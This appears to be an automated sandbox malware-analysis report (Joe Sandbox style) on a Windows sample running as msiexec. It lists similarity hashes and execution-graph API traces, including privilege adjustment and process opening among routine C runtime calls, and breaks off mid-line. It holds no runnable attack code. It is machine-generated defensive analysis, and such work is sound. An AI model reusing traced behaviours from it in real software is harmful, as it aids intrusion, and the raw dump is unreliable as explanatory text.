                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction ID: a0f0575e4a18936d0195e17a6478dd76f0ba840463d63ba74fa476125f0abf57
                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction Fuzzy Hash: 1B31092661CAC2C6D730EB64E4983AAF3A0FB84711F801136E68D87A59DB7DC50DCB10
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7179D38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D390D
                                                                                                                                                                    • Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3922
                                                                                                                                                                    • Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3935
                                                                                                                                                                    • Part of subcall function 00007FF7179D38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3945
                                                                                                                                                                    • Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D396D
                                                                                                                                                                    • Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3980
                                                                                                                                                                    • Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3995
                                                                                                                                                                    • Part of subcall function 00007FF7179D40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7179D414B
                                                                                                                                                                    • Part of subcall function 00007FF7179D40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7179D415E
                                                                                                                                                                    • Part of subcall function 00007FF7179D40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7179D4186
                                                                                                                                                                    • Part of subcall function 00007FF7179D40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7179D41B1
                                                                                                                                                                    • Part of subcall function 00007FF7179D40E4: CloseHandle.KERNEL32 ref: 00007FF7179D41BC
                                                                                                                                                                    • Part of subcall function 00007FF7179D40E4: OpenProcess.KERNEL32 ref: 00007FF7179D41D1
                                                                                                                                                                    • Part of subcall function 00007FF7179D40E4: CloseHandle.KERNEL32 ref: 00007FF7179D4249
                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF7179D3037
                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF7179D304A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Process$CloseHandleHeapOpenToken$AdjustCreateCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                  • API String ID: 3235591951-2286007224
                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction ID: d4b64eba7746867c87baa94b554bf20c2f053807b08695bfb1aebe8006aa9826
                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction Fuzzy Hash: C111C220A18EC385E710FB64E8CC3A9E7A0FB98764FC04135D54D42666EF7CE05E8B60

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:9.5%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:0.6%
                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                  Total number of Limit Nodes:31
                                                                                                                                                                  execution_graph 16584 7ff690024938 16585 7ff69002496f 16584->16585 16586 7ff690024952 16584->16586 16585->16586 16587 7ff690024982 CreateFileW 16585->16587 16609 7ff6900243d4 16586->16609 16590 7ff6900249b6 16587->16590 16591 7ff6900249ec 16587->16591 16612 7ff690024a8c GetFileType 16590->16612 16638 7ff690024f14 16591->16638 16592 7ff6900243f4 memcpy_s 11 API calls 16595 7ff69002495f 16592->16595 16598 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16595->16598 16605 7ff69002496a 16598->16605 16599 7ff6900249cb CloseHandle 16599->16605 16600 7ff6900249e1 CloseHandle 16600->16605 16601 7ff690024a20 16659 7ff690024cd4 16601->16659 16602 7ff6900249f5 16603 7ff690024368 _fread_nolock 11 API calls 16602->16603 16608 7ff6900249ff 16603->16608 16608->16605 16610 7ff69002a5d8 memcpy_s 11 API calls 16609->16610 16611 7ff6900243dd 16610->16611 16611->16592 16613 7ff690024b97 16612->16613 16614 7ff690024ada 16612->16614 16616 7ff690024b9f 16613->16616 16617 7ff690024bc1 16613->16617 16615 7ff690024b06 GetFileInformationByHandle 16614->16615 16619 7ff690024e10 21 API calls 16614->16619 16620 7ff690024b2f 16615->16620 16621 7ff690024bb2 GetLastError 16615->16621 16616->16621 16622 7ff690024ba3 16616->16622 16618 7ff690024be4 PeekNamedPipe 16617->16618 16637 7ff690024b82 16617->16637 16618->16637 16624 7ff690024af4 16619->16624 16625 7ff690024cd4 51 API calls 16620->16625 16623 7ff690024368 _fread_nolock 11 API calls 16621->16623 16626 7ff6900243f4 memcpy_s 11 API calls 16622->16626 16623->16637 16624->16615 16624->16637 16628 7ff690024b3a 16625->16628 16626->16637 16627 7ff69001b870 _log10_special 8 API calls 16629 7ff6900249c4 16627->16629 16676 7ff690024c34 16628->16676 16629->16599 16629->16600 16632 7ff690024c34 10 API calls 16633 7ff690024b59 16632->16633 16634 7ff690024c34 10 API calls 16633->16634 16635 7ff690024b6a 16634->16635 16636 7ff6900243f4 memcpy_s 11 API calls 16635->16636 16635->16637 16636->16637 16637->16627 16639 7ff690024f4a 16638->16639 16640 7ff6900243f4 memcpy_s 11 API calls 16639->16640 16658 7ff690024fe2 __std_exception_copy 16639->16658 16642 7ff690024f5c 16640->16642 16641 7ff69001b870 _log10_special 8 API calls 16643 7ff6900249f1 16641->16643 16644 7ff6900243f4 memcpy_s 11 API calls 16642->16644 16643->16601 16643->16602 16645 7ff690024f64 16644->16645 16683 7ff690027118 16645->16683 16647 7ff690024f79 16648 7ff690024f8b 16647->16648 16649 7ff690024f81 16647->16649 16651 7ff6900243f4 memcpy_s 11 API calls 16648->16651 16650 7ff6900243f4 memcpy_s 11 API calls 16649->16650 16655 7ff690024f86 16650->16655 16652 7ff690024f90 16651->16652 16653 7ff6900243f4 memcpy_s 11 API calls 16652->16653 16652->16658 16654 7ff690024f9a 16653->16654 16656 7ff690027118 45 API calls 16654->16656 16657 7ff690024fd4 GetDriveTypeW 16655->16657 16655->16658 16656->16655 16657->16658 16658->16641 16661 7ff690024cfc 16659->16661 16660 7ff690024a2d 16669 7ff690024e10 16660->16669 16661->16660 16777 7ff69002ea34 16661->16777 16663 7ff690024d90 16663->16660 16664 7ff69002ea34 51 API calls 16663->16664 16665 7ff690024da3 16664->16665 16665->16660 16666 7ff69002ea34 51 API calls 16665->16666 16667 7ff690024db6 16666->16667 16667->16660 16668 7ff69002ea34 51 API calls 16667->16668 16668->16660 16670 7ff690024e2a 16669->16670 16671 7ff690024e61 16670->16671 16672 7ff690024e3a 16670->16672 16673 7ff69002e8c8 21 API calls 16671->16673 16674 7ff690024368 _fread_nolock 11 API calls 16672->16674 16675 7ff690024e4a 16672->16675 16673->16675 16674->16675 16675->16608 16677 7ff690024c5d FileTimeToSystemTime 16676->16677 16678 7ff690024c50 16676->16678 16679 7ff690024c71 SystemTimeToTzSpecificLocalTime 16677->16679 16681 7ff690024c58 16677->16681 16678->16677 16678->16681 16679->16681 16680 7ff69001b870 _log10_special 8 API calls 16682 7ff690024b49 16680->16682 16681->16680 16682->16632 16684 7ff6900271a2 16683->16684 16685 7ff690027134 16683->16685 16720 7ff69002fad0 16684->16720 16685->16684 16687 7ff690027139 16685->16687 16689 7ff69002716e 16687->16689 16690 7ff690027151 16687->16690 16688 7ff690027166 __std_exception_copy 16688->16647 16703 7ff690026f5c GetFullPathNameW 16689->16703 16695 7ff690026ee8 GetFullPathNameW 16690->16695 16696 7ff690026f0e GetLastError 16695->16696 16697 7ff690026f24 16695->16697 16698 7ff690024368 _fread_nolock 11 API calls 16696->16698 16701 7ff6900243f4 memcpy_s 11 API calls 16697->16701 16702 7ff690026f20 16697->16702 16699 7ff690026f1b 16698->16699 16700 7ff6900243f4 memcpy_s 11 API calls 16699->16700 16700->16702 16701->16702 16702->16688 16704 7ff690026f8f GetLastError 16703->16704 16708 7ff690026fa5 __std_exception_copy 16703->16708 16705 7ff690024368 _fread_nolock 11 API calls 16704->16705 16706 7ff690026f9c 16705->16706 16707 7ff6900243f4 memcpy_s 11 API calls 16706->16707 16709 7ff690026fa1 16707->16709 16708->16709 16710 7ff690026fff GetFullPathNameW 16708->16710 16711 7ff690027034 16709->16711 16710->16704 16710->16709 16715 7ff6900270a8 memcpy_s 16711->16715 16716 7ff69002705d memcpy_s 16711->16716 16712 7ff690027091 16713 7ff6900243f4 memcpy_s 11 API calls 16712->16713 16714 7ff690027096 16713->16714 16717 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16714->16717 16715->16688 16716->16712 16716->16715 16718 7ff6900270ca 16716->16718 16717->16715 16718->16715 16719 7ff6900243f4 memcpy_s 11 API calls 16718->16719 16719->16714 16723 7ff69002f8e0 16720->16723 16724 7ff69002f90b 16723->16724 16725 7ff69002f922 16723->16725 16728 7ff6900243f4 memcpy_s 11 API calls 16724->16728 16726 7ff69002f926 16725->16726 16727 7ff69002f947 16725->16727 16749 7ff69002fa4c 16726->16749 16761 7ff69002e8c8 16727->16761 16731 7ff69002f910 16728->16731 16735 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16731->16735 16733 7ff69002f94c 16738 7ff69002f9f1 16733->16738 16744 7ff69002f973 16733->16744 16734 7ff69002f92f 16736 7ff6900243d4 _fread_nolock 11 API calls 16734->16736 16745 7ff69002f91b __std_exception_copy 16735->16745 16737 7ff69002f934 16736->16737 16741 7ff6900243f4 memcpy_s 11 API calls 16737->16741 16738->16724 16739 7ff69002f9f9 16738->16739 16742 7ff690026ee8 13 API calls 16739->16742 16740 7ff69001b870 _log10_special 8 API calls 16743 7ff69002fa41 16740->16743 16741->16731 16742->16745 16743->16688 16746 7ff690026f5c 14 API calls 16744->16746 16745->16740 16747 7ff69002f9b7 16746->16747 16747->16745 16748 7ff690027034 37 API calls 16747->16748 16748->16745 16750 7ff69002fa96 16749->16750 16751 7ff69002fa66 16749->16751 16752 7ff69002faa1 GetDriveTypeW 16750->16752 16754 7ff69002fa81 16750->16754 16753 7ff6900243d4 _fread_nolock 11 API calls 16751->16753 16752->16754 16755 7ff69002fa6b 16753->16755 16756 7ff69001b870 _log10_special 8 API calls 16754->16756 16757 7ff6900243f4 memcpy_s 11 API calls 16755->16757 16758 7ff69002f92b 16756->16758 16759 7ff69002fa76 16757->16759 16758->16733 16758->16734 16760 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16759->16760 16760->16754 16775 7ff6900397e0 16761->16775 16763 7ff69002e8fe GetCurrentDirectoryW 16764 7ff69002e93c 16763->16764 16767 7ff69002e915 16763->16767 16765 7ff69002dea8 memcpy_s 11 API calls 16764->16765 16768 7ff69002e94b 16765->16768 16766 7ff69001b870 _log10_special 8 API calls 16769 7ff69002e9a9 16766->16769 16767->16766 16770 7ff69002e964 16768->16770 16771 7ff69002e955 GetCurrentDirectoryW 16768->16771 16769->16733 16773 7ff6900243f4 memcpy_s 11 API calls 16770->16773 16771->16770 16772 7ff69002e969 16771->16772 16774 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16772->16774 16773->16772 16774->16767 16776 7ff6900397d0 16775->16776 16776->16763 16776->16776 16778 7ff69002ea41 16777->16778 16779 7ff69002ea65 16777->16779 16778->16779 16780 7ff69002ea46 16778->16780 16782 7ff69002ea9f 16779->16782 16783 7ff69002eabe 16779->16783 16781 7ff6900243f4 memcpy_s 11 API calls 16780->16781 16784 7ff69002ea4b 16781->16784 16785 7ff6900243f4 memcpy_s 11 API calls 16782->16785 16786 7ff690024178 45 API calls 16783->16786 16787 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16784->16787 16788 7ff69002eaa4 16785->16788 16793 7ff69002eacb 16786->16793 16790 7ff69002ea56 16787->16790 16789 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16788->16789 16791 7ff69002eaaf 16789->16791 16790->16663 16791->16663 16792 7ff69002f7ec 51 API calls 16792->16793 16793->16791 16793->16792 19881 7ff6900309c0 19892 7ff6900366f4 19881->19892 19893 7ff690036701 19892->19893 19894 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19893->19894 19895 7ff69003671d 19893->19895 19894->19893 19896 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19895->19896 19897 7ff6900309c9 19895->19897 19896->19895 19898 7ff69002f5e8 EnterCriticalSection 19897->19898 19300 7ff69001be70 19301 7ff69001be80 19300->19301 19317 7ff690028ec0 19301->19317 19303 7ff69001be8c 19323 7ff69001c168 19303->19323 19305 7ff69001c44c 7 API calls 19307 7ff69001bf25 19305->19307 19306 7ff69001bea4 _RTC_Initialize 19315 7ff69001bef9 19306->19315 19328 7ff69001c318 19306->19328 19309 7ff69001beb9 19331 7ff69002832c 19309->19331 19315->19305 19316 7ff69001bf15 19315->19316 19318 7ff690028ed1 19317->19318 19319 7ff690028ed9 19318->19319 19320 7ff6900243f4 memcpy_s 11 API calls 19318->19320 19319->19303 19321 7ff690028ee8 19320->19321 19322 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 19321->19322 19322->19319 19324 7ff69001c179 19323->19324 19327 7ff69001c17e __scrt_acquire_startup_lock 19323->19327 19325 7ff69001c44c 7 API calls 19324->19325 19324->19327 19326 7ff69001c1f2 19325->19326 19327->19306 19356 7ff69001c2dc 19328->19356 19330 7ff69001c321 19330->19309 19332 7ff69002834c 19331->19332 19333 7ff69001bec5 19331->19333 19334 7ff69002836a GetModuleFileNameW 19332->19334 19335 7ff690028354 19332->19335 19333->19315 19355 7ff69001c3ec InitializeSListHead 19333->19355 19339 7ff690028395 19334->19339 19336 7ff6900243f4 memcpy_s 11 API calls 19335->19336 19337 7ff690028359 19336->19337 19338 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 19337->19338 19338->19333 19371 7ff6900282cc 19339->19371 19342 7ff6900283dd 19343 7ff6900243f4 memcpy_s 11 API calls 19342->19343 19344 7ff6900283e2 19343->19344 19347 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19344->19347 19345 7ff690028417 19348 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19345->19348 19346 7ff6900283f5 19346->19345 19349 7ff69002845c 19346->19349 19350 7ff690028443 19346->19350 19347->19333 19348->19333 19352 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19349->19352 19351 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19350->19351 19353 7ff69002844c 19351->19353 19352->19345 19354 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19353->19354 19354->19333 19357 7ff69001c2f6 19356->19357 19359 7ff69001c2ef 19356->19359 19360 7ff6900294fc 19357->19360 19359->19330 19363 7ff690029138 19360->19363 19370 7ff69002f5e8 EnterCriticalSection 19363->19370 19372 7ff69002831c 19371->19372 19373 7ff6900282e4 19371->19373 19372->19342 19372->19346 19373->19372 19374 7ff69002dea8 memcpy_s 11 API calls 19373->19374 19375 7ff690028312 19374->19375 19376 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19375->19376 19376->19372 19932 7ff690039ef3 19933 7ff690039f03 19932->19933 19936 7ff690024788 LeaveCriticalSection 19933->19936 15755 7ff69002fbd8 15756 7ff69002fbfc 15755->15756 15760 7ff69002fc0c 15755->15760 15906 7ff6900243f4 15756->15906 15758 7ff69002fc01 15759 7ff69002feec 15762 7ff6900243f4 memcpy_s 11 API calls 15759->15762 15760->15759 15761 7ff69002fc2e 15760->15761 15763 7ff69002fc4f 15761->15763 15909 7ff690030294 15761->15909 15764 7ff69002fef1 15762->15764 15767 7ff69002fcc1 15763->15767 15769 7ff69002fc75 15763->15769 15776 7ff69002fcb5 15763->15776 15766 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15764->15766 15766->15758 15772 7ff69002dea8 memcpy_s 11 API calls 15767->15772 15784 7ff69002fc84 15767->15784 15768 7ff69002fd6e 15780 7ff69002fd8b 15768->15780 15785 7ff69002fddd 15768->15785 15924 7ff6900289d8 15769->15924 15773 7ff69002fcd7 15772->15773 15777 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15773->15777 15776->15768 15776->15784 15936 7ff69003643c 15776->15936 15781 7ff69002fce5 15777->15781 15778 7ff69002fc9d 15778->15776 15786 7ff690030294 45 API calls 15778->15786 15779 7ff69002fc7f 15782 7ff6900243f4 memcpy_s 11 API calls 15779->15782 15783 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15780->15783 15781->15776 15781->15784 15788 7ff69002dea8 memcpy_s 11 API calls 15781->15788 15782->15784 15790 7ff69002fd94 15783->15790 15930 7ff690029c58 15784->15930 15785->15784 15787 7ff6900326ec 40 API calls 15785->15787 15786->15776 15789 7ff69002fe1a 15787->15789 15791 7ff69002fd07 15788->15791 15792 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15789->15792 15798 7ff69002fd99 15790->15798 15972 7ff6900326ec 15790->15972 15794 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15791->15794 15795 7ff69002fe24 15792->15795 15794->15776 15795->15784 15795->15798 15796 7ff69002fee0 15800 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15796->15800 15797 7ff69002fdc5 15799 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15797->15799 15798->15796 15798->15798 15886 7ff69002dea8 15798->15886 15799->15798 15800->15758 15803 7ff69002fe79 15893 7ff6900297b4 15803->15893 15804 7ff69002fe70 15805 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15804->15805 15807 7ff69002fe77 15805->15807 15812 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15807->15812 15809 7ff69002ff1b 15902 7ff690029c10 IsProcessorFeaturePresent 15809->15902 15810 7ff69002fe90 15981 7ff690036554 15810->15981 15812->15758 15817 7ff69002fed8 15820 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15817->15820 15818 7ff69002feb7 15821 7ff6900243f4 memcpy_s 11 API calls 15818->15821 15820->15796 15822 7ff69002febc 15821->15822 15823 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15822->15823 15823->15807 15892 7ff69002deb9 memcpy_s 15886->15892 15887 7ff69002df0a 15889 7ff6900243f4 memcpy_s 10 API calls 15887->15889 15888 7ff69002deee HeapAlloc 15890 7ff69002df08 15888->15890 15888->15892 15889->15890 15890->15803 15890->15804 15892->15887 15892->15888 16000 7ff6900328a0 15892->16000 15894 7ff6900297cb 15893->15894 15895 7ff6900297c1 15893->15895 15896 7ff6900243f4 memcpy_s 11 API calls 15894->15896 15895->15894 15899 7ff6900297e6 15895->15899 15901 7ff6900297d2 15896->15901 15898 7ff6900297de 15898->15809 15898->15810 15899->15898 15900 7ff6900243f4 memcpy_s 11 API calls 15899->15900 15900->15901 16009 7ff690029bf0 15901->16009 15903 7ff690029c23 15902->15903 16071 7ff690029924 15903->16071 16093 7ff69002a5d8 GetLastError 15906->16093 15908 7ff6900243fd 15908->15758 15910 7ff6900302c9 15909->15910 15911 7ff6900302b1 15909->15911 15912 7ff69002dea8 memcpy_s 11 API calls 15910->15912 15911->15763 15917 7ff6900302ed 15912->15917 15913 7ff69003034e 15915 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15913->15915 15915->15911 15917->15913 15918 7ff69002dea8 memcpy_s 11 API calls 15917->15918 15919 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15917->15919 15920 7ff6900297b4 __std_exception_copy 37 API calls 15917->15920 15921 7ff69003035d 15917->15921 15923 7ff690030372 15917->15923 15918->15917 15919->15917 15920->15917 15922 7ff690029c10 _isindst 17 API calls 15921->15922 15922->15923 16110 7ff690029814 15923->16110 15925 7ff6900289f1 15924->15925 15926 7ff6900289e8 15924->15926 15925->15778 15925->15779 15926->15925 16176 7ff6900284b0 15926->16176 15931 7ff690029c5d RtlFreeHeap 15930->15931 15932 7ff690029c8c 15930->15932 15931->15932 15933 7ff690029c78 GetLastError 15931->15933 15932->15758 15934 7ff690029c85 Concurrency::details::SchedulerProxy::DeleteThis 15933->15934 15935 7ff6900243f4 memcpy_s 9 API calls 15934->15935 15935->15932 15937 7ff690036449 15936->15937 15938 7ff690035564 15936->15938 15940 7ff690024178 45 API calls 15937->15940 15939 7ff690035571 15938->15939 15946 7ff6900355a7 15938->15946 15942 7ff6900243f4 memcpy_s 11 API calls 15939->15942 15945 7ff690035518 15939->15945 15941 7ff69003647d 15940->15941 15950 7ff690036493 15941->15950 15953 7ff6900364aa 15941->15953 15967 7ff690036482 15941->15967 15947 7ff69003557b 15942->15947 15943 7ff6900355d1 15944 7ff6900243f4 memcpy_s 11 API calls 15943->15944 15948 7ff6900355d6 15944->15948 15945->15776 15946->15943 15949 7ff6900355f6 15946->15949 15951 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 15947->15951 15952 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 15948->15952 15958 7ff690024178 45 API calls 15949->15958 15970 7ff6900355e1 15949->15970 15954 7ff6900243f4 memcpy_s 11 API calls 15950->15954 15955 7ff690035586 15951->15955 15952->15970 15956 7ff6900364c6 15953->15956 15957 7ff6900364b4 15953->15957 15959 7ff690036498 15954->15959 15955->15776 15961 7ff6900364d7 15956->15961 15962 7ff6900364ee 15956->15962 15960 7ff6900243f4 memcpy_s 11 API calls 15957->15960 15958->15970 15963 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 15959->15963 15964 7ff6900364b9 15960->15964 16469 7ff6900355b4 15961->16469 16478 7ff69003825c 15962->16478 15963->15967 15968 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 15964->15968 15967->15776 15968->15967 15970->15776 15971 7ff6900243f4 memcpy_s 11 API calls 15971->15967 15973 7ff69003270e 15972->15973 15975 7ff69003272b 15972->15975 15974 7ff69003271c 15973->15974 15973->15975 15978 7ff6900243f4 memcpy_s 11 API calls 15974->15978 15977 7ff690032735 15975->15977 16518 7ff690036f48 15975->16518 16525 7ff690036f84 15977->16525 15980 7ff690032721 memcpy_s 15978->15980 15980->15797 15982 7ff690024178 45 API calls 15981->15982 15983 7ff6900365ba 15982->15983 15985 7ff6900365c8 15983->15985 16537 7ff69002e234 15983->16537 16540 7ff6900247bc 15985->16540 15988 7ff6900366b4 15991 7ff6900366c5 15988->15991 15992 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15988->15992 15989 7ff690024178 45 API calls 15990 7ff690036637 15989->15990 15994 7ff69002e234 5 API calls 15990->15994 15997 7ff690036640 15990->15997 15993 7ff69002feb3 15991->15993 15995 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15991->15995 15992->15991 15993->15817 15993->15818 15994->15997 15995->15993 15996 7ff6900247bc 14 API calls 15998 7ff69003669b 15996->15998 15997->15996 15998->15988 15999 7ff6900366a3 SetEnvironmentVariableW 15998->15999 15999->15988 16003 7ff6900328e0 16000->16003 16008 7ff69002f5e8 EnterCriticalSection 16003->16008 16012 7ff690029a88 16009->16012 16011 7ff690029c09 16011->15898 16013 7ff690029ab3 16012->16013 16016 7ff690029b24 16013->16016 16015 7ff690029ada 16015->16011 16026 7ff69002986c 16016->16026 16020 7ff690029b5f 16020->16015 16022 7ff690029c10 _isindst 17 API calls 16023 7ff690029bef 16022->16023 16024 7ff690029a88 _invalid_parameter_noinfo 37 API calls 16023->16024 16025 7ff690029c09 16024->16025 16025->16015 16027 7ff690029888 GetLastError 16026->16027 16028 7ff6900298c3 16026->16028 16029 7ff690029898 16027->16029 16028->16020 16032 7ff6900298d8 16028->16032 16035 7ff69002a6a0 16029->16035 16033 7ff6900298f4 GetLastError SetLastError 16032->16033 16034 7ff69002990c 16032->16034 16033->16034 16034->16020 16034->16022 16036 7ff69002a6da FlsSetValue 16035->16036 16037 7ff69002a6bf FlsGetValue 16035->16037 16038 7ff6900298b3 SetLastError 16036->16038 16040 7ff69002a6e7 16036->16040 16037->16038 16039 7ff69002a6d4 16037->16039 16038->16028 16039->16036 16041 7ff69002dea8 memcpy_s 11 API calls 16040->16041 16042 7ff69002a6f6 16041->16042 16043 7ff69002a714 FlsSetValue 16042->16043 16044 7ff69002a704 FlsSetValue 16042->16044 16046 7ff69002a720 FlsSetValue 16043->16046 16047 7ff69002a732 16043->16047 16045 7ff69002a70d 16044->16045 16048 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16045->16048 16046->16045 16052 7ff69002a204 16047->16052 16048->16038 16057 7ff69002a0dc 16052->16057 16069 7ff69002f5e8 EnterCriticalSection 16057->16069 16072 7ff69002995e _isindst memcpy_s 16071->16072 16073 7ff690029986 RtlCaptureContext RtlLookupFunctionEntry 16072->16073 16074 7ff6900299f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16073->16074 16075 7ff6900299c0 RtlVirtualUnwind 16073->16075 16076 7ff690029a48 _isindst 16074->16076 16075->16074 16079 7ff69001b870 16076->16079 16080 7ff69001b879 16079->16080 16081 7ff69001bc00 IsProcessorFeaturePresent 16080->16081 16082 7ff69001b884 GetCurrentProcess TerminateProcess 16080->16082 16083 7ff69001bc18 16081->16083 16088 7ff69001bdf8 RtlCaptureContext 16083->16088 16089 7ff69001be12 RtlLookupFunctionEntry 16088->16089 16090 7ff69001be28 RtlVirtualUnwind 16089->16090 16091 7ff69001bc2b 16089->16091 16090->16089 16090->16091 16092 7ff69001bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16091->16092 16094 7ff69002a619 FlsSetValue 16093->16094 16099 7ff69002a5fc 16093->16099 16095 7ff69002a609 16094->16095 16096 7ff69002a62b 16094->16096 16097 7ff69002a685 SetLastError 16095->16097 16098 7ff69002dea8 memcpy_s 5 API calls 16096->16098 16097->15908 16100 7ff69002a63a 16098->16100 16099->16094 16099->16095 16101 7ff69002a658 FlsSetValue 16100->16101 16102 7ff69002a648 FlsSetValue 16100->16102 16104 7ff69002a676 16101->16104 16105 7ff69002a664 FlsSetValue 16101->16105 16103 7ff69002a651 16102->16103 16106 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16103->16106 16107 7ff69002a204 memcpy_s 5 API calls 16104->16107 16105->16103 16106->16095 16108 7ff69002a67e 16107->16108 16109 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16108->16109 16109->16097 16119 7ff690032960 16110->16119 16145 7ff690032918 16119->16145 16150 7ff69002f5e8 EnterCriticalSection 16145->16150 16177 7ff6900284c9 16176->16177 16186 7ff6900284c5 16176->16186 16199 7ff690031900 16177->16199 16182 7ff6900284e7 16225 7ff690028594 16182->16225 16183 7ff6900284db 16184 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 